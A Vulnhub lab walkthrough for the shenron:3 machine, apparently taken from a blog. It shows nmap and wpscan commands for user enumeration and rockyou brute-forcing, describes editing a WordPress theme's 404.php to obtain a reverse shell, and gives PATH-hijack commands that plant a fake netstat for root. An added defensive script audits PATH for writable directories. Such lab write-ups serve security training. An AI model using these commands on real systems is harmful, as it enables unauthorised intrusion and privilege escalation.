Vulnhub: shenron:3 target machine

Date: 2023-07-31 16:34:43

Kali: 192.168.111.111

Target: 192.168.111.171

Information gathering

Port scan

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.171

After adding the target to the hosts file, visiting port 80 on the target shows that it is running WordPress.

Use wpscan to enumerate the target's users, then brute-force the password: iloverockyou

wpscan --url http://shenron/ -e u
wpscan --url http://shenron/ -U admin -P /usr/share/wordlists/rockyou.txt

After logging in, modify the target's source code to get a shell.

After the modification, visit http://shenron/wp-content/themes/twentyeleven/404.php to get a reverse shell.

Privilege escalation

The shenron user's password is also iloverockyou.

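The shenron user's home directory contains a program named network. Running it shows that the program executes the netstat command, so privileges can be escalated by modifying the PATH environment variable.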

echo '/bin/bash' > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH
./network
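
Added example, not part of the original write-up: a defender-side check for the condition this step depends on, namely a bare command name such as netstat being resolved through a PATH that contains a directory other users can write to. The function name audit_path_lookup is an assumption made for this example.

```shell
#!/bin/sh
# Added example: audit how a bare command name (e.g. "netstat") resolves
# through a given PATH string, and flag every directory searched on the way
# in which an unprivileged user could plant a same-named file.

# audit_path_lookup CMD PATHSTRING
# Prints one "UNSAFE <dir> <reason>" line per risky entry searched up to the
# match, then "RESOLVES <file>" (or "NOTFOUND").
# Returns 1 if any risky entry was searched, else 0.
audit_path_lookup() {
    cmd=$1 rc=0 found=
    old_ifs=$IFS; IFS=:
    set -f                      # no globbing while splitting the PATH string
    for dir in $2; do
        case $dir in
            '') echo "UNSAFE (empty) current-directory"; rc=1; dir=. ;;
            /*) ;;
            *)  echo "UNSAFE $dir relative-entry"; rc=1 ;;
        esac
        if [ -d "$dir" ]; then
            # 9th character of the mode string is the "other" write bit;
            # a sticky bit (as on /tmp) does not stop new files being created
            case $(ls -ld "$dir" | cut -c1-10) in
                ????????w*) echo "UNSAFE $dir world-writable"; rc=1 ;;
            esac
        fi
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            found=$dir/$cmd
            break
        fi
    done
    set +f; IFS=$old_ifs
    if [ -n "$found" ]; then echo "RESOLVES $found"; else echo "NOTFOUND"; fi
    return $rc
}

# Audit the PATH of the current session for the command used on this page.
audit_path_lookup netstat "$PATH" || true
```

A privileged program avoids the issue entirely by calling helpers by absolute path and setting its own fixed PATH before running anything.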

flag

From: https://www.cnblogs.com/ctostm/p/17593784.html
